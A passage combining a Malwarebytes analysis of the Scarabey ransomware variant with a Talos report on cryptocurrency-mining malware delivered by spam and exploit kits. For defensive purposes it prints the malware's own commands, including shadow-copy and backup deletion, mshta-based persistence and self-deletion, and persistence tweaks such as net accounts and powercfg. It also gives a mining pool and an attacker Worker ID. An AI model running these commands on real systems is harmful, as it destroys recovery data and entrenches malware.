  1. Besides the fact that the volume of data transfer to send up every file on the victim’s computer is completely unreasonable, there is no network functionality for sending files to the malware authors to hold as ransom.
  2. There is no backdoor or remote access code in scarab or its variants, which makes the threat of deleting files on victim’s computer impossible.
  3. The decryption process, from our understanding, is that they will send you decryption software loaded with the unique key after the ransom is payed. Then you can run the software and decrypt your files. That being said, there is no way for them to limit what gets decrypted as it is done locally and offline.
  4. Nowhere in the malware’s code is there any section that deletes user’s files from the computer.

Specifically, in the message, you see the author implying that the code is initially decrypted server side, which is untrue:

“24 files are deleted every 24 hours. (we have copies of them)
If you do not run the decryption program within 72 hours, all the files on the computer are completely deleted, without the possibility of recovery.”

Then, the malware author gives the steps to decrypt, which reference the use of a decryption program sent to the victim after payment. A decryption software received after payment with your unique key will decrypt files locally:

“- After starting the decoder, the files are decoded within an hour.
– Decoders of other users are incompatible with your data, as each user
unique encryption key”

The conclusion here is that the deletion of files or the idea that the malware authors have access to delete files is purely a scare tactic used to urge users into sending money quickly.

Technical analysis

While comparing the code from Scarab to Scarabey, it became quite clear that this variant, although written in Russian and targeting Russian users, likely comes from the same authors of the original. Throughout the entire code, both variants of malware are almost byte-for-byte identical. In addition, the sub processes generated, the dropped files, the encryption method used, and the mutexes used are all identical between the original Scarab version and Scarabey. This is the reason we consider it a variant, rather than a new family.

The following image shows the output from the two malware variants. The only things that differ are the addresses of code and memory data references (highlighted in yellow and red).

Code analysis

The Scarabey variant is written in Delphi. First, it starts off by checking if it is the first time being run. It does this by checking if it has parameters passed in. If not, it checks to see if the following registry key has been set:

Software\ILRTISo\idle

[First run check, registry key]

If not set (meaning it is the first time run), it checks that SEVNZ has not been created yet and executes cmd.exe to copy itself into temp roaming directory as sevnz.exe using:

cmd.exe /c copy /y C:\Users\virusLab\Desktop\9a02862ac95345359dfc3dcc93e3c10e.exe “C:\Users\virusLab\AppData\Roaming\sevnz.exe”

Then it spawns a process of itself with param ‘runas’ as it exits.

[verifies SEVNZ.EXE does not exist, copies self to SEVNZ.EXE. executes elf with ‘runas’ param]

Now the sub process takes over.

The code flow now enters the same function as before, and deletes SEVNZ and re-copies it. It skips over those initial sections because of the parameter passed in. It then executes the previously copied file sevnz.exe:

C:\Users\[username]\AppData\Roaming\sevnz.exe

Then, it opens the process cmd.exe with command line…

“mshta.exe “javascript:o=new ActiveXObject(‘Scripting.FileSystemObject’);setInterval(function(){try{o.DeleteFile(‘9a02862ac95345359dfc3dcc93e3c10f.exe’);close()}catch(e){}},10);””

…which simply waits and deletes itself, since the process can’t delete while running.

Now onto the SEVNZ.exe process:

The process checks to see if it is currently running as sevnz.exe by trying to delete
“…AppData\Roaming\sevnz.exe” 

If it fails, it now knows that it is currently running as sevnz.exe rather than the original executable. Once it passes this check, it uses mtsha.exe to execute Javascript, which will delay and add itself into the registry auto-run:

mshta.exe “javascript:o=new ActiveXObject(‘WScript.Shell’);
x=newActiveXObject(‘Scripting.FileSystemObject’);
setInterval(function(){try{i=x.GetFile(‘sevnz.exe’).Path;
o.RegWrite(‘HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\ILRTISo’,i);}
catch(e){}},10);

Next, it proceeds to delete shadow volume copies, which is standard for ransomware to make sure users cannot restore encrypted files.

—–Executes these scripts with mtsha.exe:—–
ActiveXObject(“WScript.Shell”);
o.Run(“cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0”,0);
o.Run(“cmd.exe /c wmic SHADOWCOPY DELETE”,0);
o.Run(“cmd.exe /c vssadmin Delete Shadows /All /Quiet”,0);
o.Run(“cmd.exe /c bcdedit “
new ActiveXObject(“WScript.Shell”);
o.Run(“cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP-keepVersions:0”,0);
o.Run(“cmd.exe /cwmicSHADOWCOPYDELETE”0);
o.Run(“cmd.exevssadminDeleteShadows /All/Quiet”,0);
o.Run(“cmd.exe /c bcdedit /set {default} recoveryenabled No”,0);
o.Run(“cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures”,0);

It then opens a thread that loops forever and makes sure no “key” processes are running. If any are found, it kills those processes. The reason for this is possibly that these processes have a lock on some files that the ransomware would have otherwise wanted to encrypt. So by killing these processes, it frees the files for encryption. The key processes are from a string generated:

agntsvc.exe
isqlplussvc.exe
ncsvc.exe
msftesql.exe
sqlagent.exe
sqlbrowser.exe
sqlservr.exe
sqlserver.exe
sqlwriter.exe
oracle.exe
ocssd.exe
dbsnmp.exe
synctime.exe;
mydesktopqos.exe
agntsvc.exe
isqlplussvc.exe
xfssvccon.exe
mydesktopservice.exe
ocautoupds.exe
agntsvc.exe
agntsvc.exe
agntsvc.exe
encsvc.exe
firefoxconfig.exe
tbirdconfig.exe
ocomm.exe
mysqld.exe
mysqld-nt.exe
mysqld-opt.exe
dbeng50.exe
sqbcoreservice.exe

In the main loop of the encryption function, it performs constant checks throughout the code for a mutex, and if it exists, this is a sign to clean itself up and remove itself from the system:

MUTEX:   STOPSCARABSTOPSCARABSTOPSCARABSTOPSCARABSTOPSCARAB.

The encryption loop can be called through many different sections in the code, but the section that runs initially and performs the majority of the encryptions is pictured below:

Recursively goes through all folders and checks to make sure the extension is not .exe or .dll. If okay, it encrypts files and renames them with a .scarab extension.

[checking current file extension using POS(),  if exists as substr of “exe,dll”]

The encryption code does not directly use any crypto APIs. Instead, the AES code is embedded within the malware, as shown in the images above.

[section is the setup leading to the call to the main cryptor function]

Encryption algorithym

We have determined that the algorithm for encryption is AES. A 4-byte chunk (0xDEFACE01) is tacked onto the buffer before the actual file data that it reads. This could be salt, or a joke from the malware author. It performs some data manipulation operations using generated bytes, which could likely be the initialization vector to create randomness.

[IV GENERATOR FUNCTION FOLLOWED BY START OF AES SETUP]
[XORS DATA PASSED INTO THE MAIN_AES_LOOP_FUNCTION WHICH IS THE IV.  var_8 being the encryption key]

The malware proceeds to run AES 256 on the data, via the AES_ALGO labeled function. We determined it’s AES 256 because of a few properties.

  1. It uses 16-character blocks. This is pretty standard for any type of AES. It encrypts 16 characters from the file at a time, which is 128 bits.
  2. What differentiates the versions of AES is the size of the keys and the number of encryption rounds. In this case, it uses 14 rounds, which is standard for AES 256, instead of 10, which is standard for AES 128.  The key size is also 256 bits (32 bytes or characters).
  3. The sub type CBC (cipher block chaining) is also being used. The main indicator for CBC here is that the previous cipher text is used to encrypt the next plain text block. In other words, the previous encrypted block is used as the initialization vector for the next block of data to encrypt.
[showing the flow for AES CBC, IV being used first, followed by previous cipher text being used as IV]

In this case, the IV bytes are being XORed against the plain text bytes as an initialization step to create more randomness in the results. As you can see from the next image, the output of AES is then copied into the variable that will be used at the beginning of the loop to initialize the next plain text block before performing AES on it. At this point, it should be clearly AES usage, despite not being called via crypto APIs.

[The image below shows where the previous cipher-text is used for initialization as the IV. NOTE: var_28 will contain the encrypted data]

Below are a few screenshots illustrating the algorithm. As you can see, the data is loaded into matrixes. Then, a series of data operations is performed against some hardcoded data, together with the encryption key bytes. What you are seeing below in the highlighted text is one set of operations (1 of 4) in a single round. Four of these sets make up one encryption round. This is because in order to perform the matrix mathematics, you need to perform the operation for each item in the matrix against each of the others. And as stated earlier, 14 rounds total are done.


The encoded encryption key is written in the registry ‘temp’ key:

If the key is found in the registry, it proceeds to the function that decodes the key from the registry into the raw encryption key. Otherwise, it jumps to new generate function.

This is interesting because it is the main key used to encrypt files. The format is similar to the key from the ransom note, but this one is longer, suggesting that the key given to the user as the ID is an encoded version of the key stored in the registry. Example of the dumped key:

[HKEY_CURRENT_USER\Software\ILRTISo]
"temp"="VkIAAAAAAADpt9Q2lAzhCExfqjLoD3vSpluc678N56Zn8b7LVRxMi1ZsYk2HXD1e4s3tiefTmZJAc0vxPposvLzP0yaCh5+KRQm60U0EkzeB2NXetarabUFYgJxb8QRsygKaOqBriC4Bs4ajM24h=e2CsVNP9R3q==UXNmfRFGIsv7NR9BIxE35bdoFpTU8rMGQ14MeQcAii1iY7GpNoY3b4DOgfuKGo3qNC1MYKYdfpn0dbiow3f7ZQGClpwTZ0shFhkWk7aTA7TM1prtgJte7TWe=ERHg8GaFrZtVs9ylNTYPt5CmzHBdAIaXeKZvZnSSafbi83o9gLgAS1OxAb7LBtJpZAJDyBkuyJFR4dFbXztponIBKT1OjtTvTMy07+0B4jI3=K1QGuKSROjAdCF06TsjKWlvUw0iUHRGasz946H3Mnxu3GdCHrAp9Cd94bMo1x1PVdIi3bXSwobjgOlJgJPJC4Y6J4QIE=e45PDNzdK6aCY0uiQ0jOD=8lDWTp=+r+dbGJrJ12qn8CRnBwaFIpyNjDhzdMdTwyvExCmuOesOLms8S7TRoV1GcTyWJAQpSJYcR66H6CngM5GHopdpoTH4mWVOOYp5HFHTDAvMafomF2S6xEmUgXIcKpB7oNohO+Wx0cUmf95=+9uozHMBWE4kFhj+OOKw0I7w7HnwYfafhxsw0CmoOvorZztXk8whlh1d4U26z=aJ6JwH8wVBSszsRLQ+H4y3bRaeupq5Vo+smDfigjVVzCam4HoAdOKzN9MWiigl9Oi+4vTkSFFazc6HzyVaHg8luKGBJMhi2FNHTFO56RA"

Versus the key from the ransom note:

+4IAAAAAAADIGnmIHZL=FYRQCAN=AgKnzw+0uzFbXSR5AdFlfTrhWN9sifnho8LiX5=V8SbNVWyWWrdbTLipFEeeEv=9zLmnid8e
UqlqKr2RUN=V7LdjoyNwjWMNbylRiGNAKWK6g9exeHhVfUrZ+9oRTq6Kp5eNe7kDdV7UMPVZ12=5pm9a+5lOMw==TNi2R2tUjFcK
tTD3c9IZgJwOMgcOw3fRrmgaloh5cIV3V74DRy2segx13RDL4J6B+gJnfT2mxIZuBE1G5HcmuLHCoqQif2BamhfbMASCUEpOp7+Z
G0jI=1PTmOhD3Yq4XjJWI4mc61AruRlaYqwPTUUbrsI0zTYX1mmM3Tvyso8bqDy4h5meyPYuXlgtRj06mtdrGZszb6ObsIT4Fz0O
Ag=4HgI4VSHA=HAU5yCjZzIIkLhlWGvdAk

The key used to encrypt changes from file to file. Meaning that two files with identical content will be different after encryption. Essentially what happens is that there is a initial key and many sub keys are derived from that key. If just a single encryption key was used for all of the files (which has been seen with other ransomware), you would be able to capture memory at any point in the encryption process, save the key, and use it to decrypt all of the files on your hard drive. Unfortunately, because of this key cycling that Scarab performs, it makes decryption of the files likely impossible.

After full disk encryption is complete, the ransomware proceeds to a call function that enumerates all network folders and drives. For example: VMWare shared folders, Terminal services, Network Drives. If any are found, it encrypts the files within those folder as well.

Once complete, it opens the encryption message via notepad.exe.

Rumors

There have been a number of articles we’ve come across online that state that Scarabey has the ability to act as a backdoor, allowing remote access, and also may gather sensitive data. From our analysis, we believe this to be untrue. We found no signs of any other functionality aside from simply encrypting files on user’s computer.

Additionally, there were rumors of Scarab being built off of the open source ransomware project on gitHub called HiddenTear. We have confirmed this to be untrue in both our own research and with external researchers. It seems to be an industry consensus now that it was mistakenly posted.

Malwarebytes for Windows detects this threat and its variant as: Ransom.Scarab.

The post Scarab ransomware: new variant changes tactics appeared first on Malwarebytes Labs.

Ransom Where? Malicious Cryptocurrency Miners Takeover, Generating Millions

The Dark Side of the Digital Gold Rush


This post was authored by Nick Biasini, Edmund Brumaghin, Warren Mercer and Josh Reynolds with contributions from Azim Khodijbaev and David Liebenberg.


Executive Summary


The threat landscape is constantly changing; over the last few years malware threat vectors, methods and payloads have rapidly evolved. Recently, as cryptocurrency values have exploded, mining related attacks have emerged as a primary interest for many attackers who are beginning to recognize that they can realize all of the financial upside of previous attacks, like ransomware, without needing to actually engage the victim and without the extraneous law enforcement attention that comes with ransomware attacks.

This focus on mining isn't entirely surprising, considering that various cryptocurrencies along with "blockchain" have been all over the news as the value of these currencies has exponentially increased. Adversaries have taken note of these gains and have been creating new attacks that help them monetize this growth. Over the past several months Talos has observed a marked increase in the volume of cryptocurrency mining software being maliciously delivered to victims.

In this new business model, attackers are no longer penalizing victims for opening an attachment, or running a malicious script by taking systems hostage and demanding a ransom. Now attackers are actively leveraging the resources of infected systems for cryptocurrency mining. In these cases the better the performance and computing power of the targeted system, the better for the attacker from a revenue generation perspective. IoT devices, with their lack of monitoring and lack of day to day user engagement, are fast becoming an attractive target for these attackers, as they offer processing power without direct victim oversight. While the computing resources within most IoT devices are generally limited, the number of exposed devices that are vulnerable to publicly available exploits is high which may make them attractive to cyber criminals moving forward.

To put the financial gains in perspective, an average system would likely generate about $0.25 of Monero per day, meaning that an adversary who has enlisted 2,000 victims (not a hard feat), could generate $500 per day or $182,500 per year. Talos has observed botnets consisting of millions of infected systems, which using our previous logic means that these systems could be leveraged to generate more than $100 million per year theoretically. It is important to note that due to volatility present across cryptocurrency markets, these values may change drastically from day to day. All calculations in this blog were made based on XMR/USD at the time of this writing.

This is all done with minimal effort following the initial infection. More importantly, with little chance of being detected, this revenue stream can continue in perpetuity. While these are impressive figures, it's also important to factor in a few details that can further increase the value of these attacks exponentially:
  • The value of many cryptocurrencies are skyrocketing. Monero, one of the most popular mining targets, saw a 3000% increase over the last 12 months.
  • These attacks are much stealthier than their predecessors. Attackers are not stealing anything more than computing power from their victims and the mining software isn't technically malware -- So theoretically, the victims could remain part of the adversary's botnet for as long as the attacker chooses.
  • Once the currency is mined, there is no telling what the attacker might do with it. This could become a long term investment (or even retirement) scheme for these attackers – sitting on this currency until it hits such a point where the attacker decides to cash in.

Introduction


Throughout the past couple of years ransomware has dominated the threat landscape and for good reason. It creates a highly profitable business model that allows attackers to directly monetize their nefarious activities. However, there are a couple of limitations with the use of ransomware. First is the fact that only a small percentage of infected users will actually pay the ransom demanded by the attacker. Second, as systems and technology get better at detecting and blocking ransomware attacks the pool of possible victims is changing. Potential victims in many countries lack the financial capabilities to pay $300-$500 to retrieve their data. Possibly related to these aforementioned limitations, we have begun to see a steady shift in the payloads that are being delivered. This is especially true for some of the most common methods for malware distribution such as exploit kits and spam campaigns.

Over the past several months Talos has started to observe a marked increase in the volume of cryptocurrency miners being delivered to victims. Cryptocurrency and "blockchain" have been all over the news over the past several months as the value of these currencies has increased on an exponential path. One of the most effective ways to generate these currencies is through mining and adversaries are obviously paying attention.

What is 'Mining'?


At a high level mining is simply using system resources to solve large mathematical calculations which result in some amount of cryptocurrency being awarded to the solvers. Before we get too deep into mining let's address the currencies that make sense to mine.

Bitcoin (BTC) is the most well known and widely used cryptocurrency by a wide margin. It's been mined since its inception, but today mining isn't an effective way to generate value. If you look across all of the cryptocurrencies, there are only a couple that are worth mining without specialized hardware called ASICs (Application Specific Integrated Circuits). The differences across the different cryptocurrencies are based on the hashing algorithm used. Some have been specifically designed in an attempt to prevent or hinder the use of such specialised hardware and are more focused on consumer grade equipment such as CPU & GPU hardware. Currently, the most valuable currency to mine with standard systems is Monero (XMR) and adversaries have done their research. In addition Monero is extremely privacy conscious and as governments have started to scrutinize Bitcoin more closely, Monero and other coins with heavy emphasis on privacy may become a safe haven for threat actors.

There are two ways that mining can be performed, either with a stand alone miner or by leveraging mining pools. Pool-based crypto mining allows you to pool the resources of multiple systems resulting in a higher hashrate and theoretically the production of increased amounts of currency. It's pool-based mining of Monero that we have seen most frequently leveraged by attackers as it allows for the greatest amount of return on investment and the required mining software can be easily delivered to victims. The use of pooled mining also maximizes the effectiveness of the computing resources found in standard systems that attackers attempt to compromise. This is similar to launching Distributed Denial of Service (DDoS) attacks where 100,000 machines flooding a target with bogus traffic becomes much more effective compared to a single system under the attacker's control sending bogus traffic.

How does pool based mining work?


Pool-based mining is coordinated through the use of 'Worker IDs'. These IDs are what tie an individual system to a larger pool and ensures the coin mined by the pool that is associated with a particular Worker ID are delivered to the correct user. It's these Worker IDs that allowed us to determine the size and scale of some of the malicious operations as well as get an idea of the amount of revenue adversaries are generating. For the purposes of this discussion we will be assuming the following:
  1. The amount of hashes per second that a typical computer can compute will be assumed to be ~125 H/s.
  2. While in reality mining does not always guarantee successful generation of the cryptocurrency being mined, we will assume that for our purposes it is successful as it allows for a better understanding of the earning potential for these malicious mining pools.
These miners typically operate from the command line and make use of a series of arguments used to establish how the mining should be performed. A typical example of the command line syntax used to execute the mining software and specify the arguments is below: (note that there are variations in the parameter names used based on the specific mining software being used.)
Example Command Line Syntax

As you can see there are two primary argument values required: The URL for the mining pool and the 'Worker ID' that is used to tie the mining activity taking place on the system to a specific mining pool which is used to manage how payouts are conducted. However, through our investigation we have found a plethora of other parameters that attackers or miners can specify in an attempt to hide their activities. If the mining software is executed without these options, victims might notice significant performance degradation on their systems as no computing resource limits are enforced. These options include:
  • Limits on CPU Usage.
  • Limits on System Temperature.
  • Amount of cores being used.
  • Sleep periods.
Each mining program comes with its own set of flags that are taken advantage of in various ways by both legitimate and malicious miners. We have observed that these options are typically deployed by the attackers when they achieve persistence (i.e. through the creation of Scheduled Tasks or Run keys that execute the miner using the Windows Command Processor specifying the arguments to use).

Origins on the Underground


Talos has been observing discussions regarding the use of crypto miners as malicious payloads by both Chinese and Russian crimeware groups. We first observed Chinese actors discussing miners and the associated mining botnets in November 2016 and the interest has been steadily building since that time.

From a Russian underground perspective there has been significant movement related to mining in the last six months. There have been numerous discussions and several offerings on top-tier Russian hacking forums. The discussions have been split with the majority of the discussion around the sale of access to mining bots as well as bot developers looking to buy access to compromised hosts for the intended purpose of leveraging them for crypto mining. The popularity increase has also been accompanied with a learning curve associated with mining, including a better understanding around how much coin can be mined and the opportune times to conduct the mining activity. As far as the malware that can be used to conduct mining, most of them are written in C# or C++ and as is common on these forums they are advertised with low detection rate, persistence, and constant development. In many cases we are observing updates to these threats on a daily or weekly basis.

In general the attackers have been pleased with the amount of revenue the bots generate as well as the potential to grow that revenue. This is indicative of a threat that is poised to become more pervasive over time. Let's take a look at how malicious mining works and the threats that are delivering them.

Malicious Mining


Malicious mining is the focus of this post since its an emerging trend across the threat landscape. Adversaries are always looking for ways to monetize their nefarious activities and malicious mining is quickly becoming a cash cow for the bad guys.

Over the past several years ransomware has dominated the threat landscape from a financially motivated malware perspective and with good reason. It is an extremely profitable business model as we've shown through our Angler Exploit Kit research where we estimate that the adversaries behind Angler could have been conservatively making at least $30 million annually. However, with success comes attention and with that attention came an increased focus on stopping this type of activity. Both operating systems and security vendors got better at stopping ransomware before it affected much of the system.

Adversaries are left with an interesting decision, continue leveraging ransomware as a primary source of revenue as the pool of users and vulnerable systems continues to shrink or begin leveraging other payloads. There are no shortage of options available to bad guys including banking trojans, bots, credential stealers, and click-fraud malware to name a few.

So why choose crypto mining software?

There are many reasons why adversaries might choose to leverage crypto mining to generate revenue. One likely reason is that this is a largely hands off infection to manage. Once a system has a miner dropped on it and starts mining nothing else is needed from an adversary perspective. There isn't any command and control activity and it generates revenue consistently until its removed. So if an adversary notices a drop off in nodes mining to their pool it's time to infect more systems. Another is that it's largely unnoticed by the majority of users. Is a user really going to notice that mining is going on while they are reading their email, browsing the web, or writing up their latest proposal? From this perspective miners are the polar opposite of ransomware, hiding under the users purview for as long as possible. The longer the user doesn't notice the miner running the larger potential payout for the activity.

The biggest reason of them all is the potential monetary payout associated with mining activity. If it didn't generate a profit, the bad guys wouldn't take advantage of it. In this particular vein malicious miners could be a pretty large source of revenue. The biggest cost associated with mining is the hardware to mine and the electricity to power the mining hardware. By leveraging malicious miners attackers can take both of those costs out of the equation altogether. Since they are able to take advantage of computing resources present in infected systems, there is no cost for power or hardware and attackers receive all the benefits of the mined coin.

Let's take a deeper dive on the amount of revenue these systems can potentially generate. As mentioned earlier the hashrate for computers can vary widely depending on the type of hardware being used and the average system load outside of the miners. An average system would likely compute somewhere around 125 hashes per second. One system alone without any hardware or electricity cost would generate about $0.25 of Monero a day, which doesn't seem like a lot but when you start pooling systems the amount of earning potential increases rapidly.

Some of the largest botnets across the threat landscape consist of millions of infected systems under the control of an attacker. Imagine controlling a small fraction of the systems that are part of one of these botnets (~2,000 hosts). The amount of revenue that can be generated per day increases considerably to more than $500 in Monero per day or $182,500 per year. As we will demonstrate later in the post we have seen malicious pools that far exceed the 125 KH/s necessary to generate this type of revenue.

In one campaign that we analyzed, the attacker had managed to amass enough computing resources to reach a hash rate of 55.20 KH/s. As can be seen in the below screenshot the Total Paid value was 528 XMR, which converts to approximately $167,833 USD. In this particular case the mining pool realized that the 'Worker ID' was being used by a botnet to mine Monero.
Worker ID Statistics

In a series of attacks that we observed that began at the end of December 2017, attackers were leveraging exploits targeting Oracle WebLogic vulnerabilities (CVE-2017-3506 / CVE-2017-10271). In these cases, successful exploitation would often lead to the installation and execution of mining software.
Historical Hash Rate

In analyzing the size and scope of this campaign, we observed that shortly after these attacks began the 'Worker ID' being used was generating over 500 KH/s. At the time of this writing, this particular attacker is still generating approximately 350 KH/s.
Current Hash Rate

Using an online calculator that takes hash rate, power consumption and cost then estimates profitability. Given a hash rate of 350 KH/s, the estimated amount of Monero that would be mined per day was 2.24 XMR. This means that an attacker could generate approximately $704 USD per day, which equals $257,000 per year. This clearly indicates how lucrative this sort of operation could be for attackers.

Analyzing the statistical data and payment history information associated with this 'Worker ID' shows that a total of 654 XMR have been received. At the time of this writing, that would be worth approximately $207,884.
Worker ID Payment History

While analyzing the malware campaigns associated with the distribution of mining software, we identified dozens of high volume 'Worker IDs'. Taking a closer look at 5 of the largest operations we analyzed shows just how much money can be made by taking this approach.
High Volume Calculations

One additional benefit is that the value of the Monero mined has continued to rise over time. Much like Bitcoin, Monero valuation has exploded over the last year from $13 in January 2017 to over $300 at the time of this article and at times has approached $500. As long as the cryptocurrency craze continues and the value continues to increase, every piece of cryptocurrency mined increases in value which in turn increases the amount of revenue generated. That covers some of the financial reasons adversaries leverage malicious mining, but how are these miners getting on to systems in the first place.

Threats Delivering Miners


Cryptocurrency miners are a new favorite of miscreants and are being delivered to end users in many different ways. The common ways we have seen miners delivered include spam campaigns, exploit kits, and directly via exploitation.

Email Based


There are ongoing spam campaigns that deliver a wide variety of payloads such as ransomware, banking trojans, miners, and much more. Below are examples of campaigns we've seen delivering miners. The way these infections typically work is that a user is sent an email with an attachment. These attachments typically have an archive containing a Word document that downloads the miner via a malicious macro or unpacks a compressed executable that initiates the mining infection. In many of the campaigns Talos observed, the binary that is included is a widely distributed Monero miner which is executed with the miscreants worker ID and pool, allowing attackers to reap the mining benefits.

Below is an example, from late 2017, of one of these campaigns. It's a job application spoof that includes a Word document purporting to be a resume of a potential candidate.
Example Malicious Email

As you can see the email contains a word document which, when opened, looks like the following.
Example Word Document

As is common for malicious Word documents, opening the document results in a file being downloaded. This is an example of a larger miner campaign dubbed 'bigmac' based on the naming conventions used.

This image entices the user to enable macro content within the document that is blocked by default. Once clicked, Word executes a series of highly obfuscated VBA macros using the Document_Open function:
Highly Obfuscated VBA Macros Using Document_Open()

The macro leads to a call to a Shell command:
Highly Obfuscated VBA Macro VBA.Shell Call

We can see what is executed by this command after it is de-obfuscated by setting the first parameter into a MsgBox call:
MsgBox for Shell Replacement

This will retrieve an executable remotely using System.Net.WebClient and execute it using Start-Process. This can also be seen through the dynamic activity in Threat Grid:
Office Document Launches a Powershell Indicator in Threat Grid

We also identify that the downloaded binary is attempting to masquerade itself through its use of an image extension:
Portable Executable Image Extension Identification Threat Grid

In this case the binary that is downloaded is a portable executable written in VB6 that executes a variant of the xmrig XMR CPU miner. This activity can be seen dynamically within Threat Grid:
xmrig Execution in Threat Grid

Dynamic miner activity can also be observed within the AMP for Endpoints product line. An example below can be seen within the portal's Device Trajectory:
Dynamic Miner Execution in AMP for Endpoint's Device Trajectory

Mining network traffic can also be classified using Cognitive Threat Analytics to identify miners within enterprise environments:
Mining Traffic Classification using Cognitive Threat Analytics

Dark Test Cryptomining Malware


Dark Test (the name taken from the decompiled source code) is an example of Cryptomining malware written in C# that drops a UPX packed variant of the xmrig XMR CPU miner. Being written in C#, the binary contains .NET IL (Intermediate Language) which can be decompiled back into source code. The C# code is highly obfuscated containing an encrypted resource section for all referenced strings, and functions that are resolved at runtime. The following section will discuss these techniques in detail.

Dark Test Obfuscation


Dark Test makes use of a packer which, after unpacking, creates a suspended version of itself using CreateProcessA and overwrites itself in memory with the unpacked version of the binary using WriteProcessMemory. The original binary can be recovered simply by setting a breakpoint on WriteProcessMemory within a debugger and dumping from the address of lpBuffer buffer up to nSize.

Dark Test contains highly obfuscated C# code made up of a large amount of garbage instructions, arithmetic for branching to varying code sections, encrypted strings stored within its resource section, and functions that are resolved at runtime. Functions are resolved on load using arithmetic operations resulting in the metadataToken passed to Method.ResolveMethod and MethodHandle.GetFunctionPointer:
Dynamic Method Resolution Using metadataToken Integer

Functions are also indirectly called using the calli function which is passed a pointer to an entry point of a function and its accompanying parameters:
Runtime Resolved Function Calls using calli

The decryption function takes three integer parameters. The first two make up the seek offset for the length and offset of the string to be decrypted, and the third is the XOR key for the string at this offset:
Dark Test String Decryption Function

At the calculated offset, the first four bytes is the offset of the ciphertext, and the next four is length of the string being decrypted. It then iterates for this length within an XOR for loop to decrypt the string at this offset. These integer parameters are calculated at runtime, typically through a series of arithmetic operations and referenced runtime objects:
Dark Test String Decryption Function Call

The result, in this case, being the string "-o pool.minexmr.com:4444 -u" which is the domain and port combination for the mining pool the miner is participating in and the username parameter without a value. Although these strings are decrypted at runtime they are easily seen through the dynamic activity execution within Threat Grid (in this case another pool is chosen from the config for use):
Dynamic Miner Activity Command Line Arguments

Runtime resolved objects and functions make it difficult to extract all strings as the decompilation is not always perfect, and not all strings are decoded during dynamic analysis due to different code branches (as seen in the example above). The num6 length calculation produces three unique bytes (in decimal): [106, 242, 28] for each length. The result is that we can search for these bytes (being the first three of the length calculation) to find runtime calculated offsets. Once we know the length we can glean the ciphertext offset from the previous four bytes, and then brute force the XOR key at this offset by iterating over all possibilities and checking for resulting valid ASCII ranges:
#!/usr/bin/ruby

fr = File.read(ARGV[0])
fb = fr.bytes

for i in 0..fb.length-4
#Through their obfuscation technique we get an egg for obfuscated string lengths and offsets to find in the resource
if fb[i] == 106 && fb[i+1] == 242 && fb[i+2] == 28
#Perform their arithmetic with provided bytes into an 32-bit int
length = [fb[i-1], 106, 242, 28].pack("V*").split("\x00").join.unpack("V")[0] - 5 ^ 485648943
seek_offset_bytes = [fb[i-5], fb[i-4], fb[i-3], fb[i-2]]
seek_offset = (seek_offset_bytes.pack("V*").split("\x00").join.unpack("V")[0] ^ 2100157544) - 100
puts "Found length of: #{length}"
puts "Seek offset bytes: #{seek_offset_bytes.inspect}"
ciphertext = []
for j in 0..length-1
ciphertext << fb[seek_offset+j]
end
if length > 2
for x in 0x00..0xFF
finished = true
result = []
for c in ciphertext
unless((x ^ c).between?(0x20,0x7E))
finished = false
break
end
result << (x ^ c)
end
if finished
puts "Found possible XOR key for string: #{result.pack("I*").split("\x00").join} of length: #{length}"
end
end
end
end
end

This brute force approach provides some invalid results, however, also provides clear-text strings after manual review, all of which are available in the appendix. Some interesting strings to highlight are those intended to keep the computer online to continue mining:
/C net accounts /forcelogoff:no
This prevents forced logoffs from remote administrators.
/C net accounts /maxpwage:unlimited
This sets the maximum password age to unlimited, which in turn prevents password expiry.
/C powercfg /x /standby-timeout-ac 0
This will prevent the computer from entering standby mode, thus continuing mining operations when the computer is idle.
/C reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeOut /t REG_SZ /d 600000000 /f of length: 99
This will prevent the screensaver from starting.

Further, observed strings are those for anti-analysis:
procexp
PROCEXP
pROCESShACKER
ProcessHacker
procexp64
Detect detector!
Clear!
taskmgr

Dark Test Network traffic


Two GET requests are sent to the api.ipfy.org used for public IP address identification. This is then followed by a GET request to qyvtls749tio[.]com which sends HwProfileInfo.szHwProfileGuid for identification, a 64-bit flag, a video card parameter (which is always null), and the number of CPU cores. The server response provides youronionlink[.]onion URL locations of two executable files: bz.exe and cpu.zip
Dynamic Miner Activity Command Line Arguments

Oddly enough this is not a valid .onion address, and is likely a placeholder from the server for this dropper, or a kiddie who set this up without replacing what the gateway was returning to the dropper on request. When searching for this pattern we came across a valid pastebin address containing a number of SQL commands for setting up a database with these domains with Russian comments:
Pastebin SQL Commands

This further implies the possibility of a builder or distributed gateway being used. Further searches turned up a number of in-the-wild filenames which correspond to wares:
Dark Test VirusTotal Observed in-the-wild Filenames

This could indicate warez as being a possible distribution vector for this malware.

Dark Test Version 2


Throughout the month of November, we started observing a sample with the same command and control parameters, mining pool, and persistence executable name as Dark Test. However, it did not drop and execute a separate xmrig binary but contained a statically linked version instead. Due to shared attributes with the first version of Dark Test we believe this is a new iteration written in Visual C++ rather than C#. The binary is shipped within an NSIS self-extracting installer, which launches unpacking code that writes into a newly spawned suspended process and resumes the main thread. A notable difference is a more extensive list of anti-analysis strings which are searched for using Process32FirstW:
Anti-Analysis Strings

An interesting addition being vnc.exe to possibly detect VPS or analysis systems connected to using VNC.

Exploit Kit Based


In addition to the spam campaigns above Talos has also been observing RIG exploit kit delivering miners via smokeloader over the last couple months. The actual infection via the exploit kit is pretty standard for RIG activity. However, the great thing about mining is there are easily trackable elements left on the system, namely the 'Worker ID', as shown below:
Command Line Syntax

Using the Worker ID of:
43Z8WW3Pt1fiBhxyizs3HxbGLovmqAx5Ref9HHMhsmXR2qGr6Py1oG2QAaMTrmqWQw85sd1oteaThcqreW4JucrLGAqiVQD
we began digging into the amount of hashes this system is mining. What we found was a worker that was fluctuating between 25 KH/s and 60 KH/s. Taking the average at 42.5 KH/s, this actor was earning about $85/Day.

That may not seem like a substantial amount of money, but consider that the miner could remain running for months, if not years without being impacted without additional maintenance required by the actor. The only operational costs are associated with renting the exploit kit and associated infrastructure. Once victims are compromised, the activity continues for a cool $31,000 annually.

However, when we started looking further back, this campaign has been ongoing off and on over the last six months with peak hash rates in excess of 100 KH/sec.
Historical Hash Rate

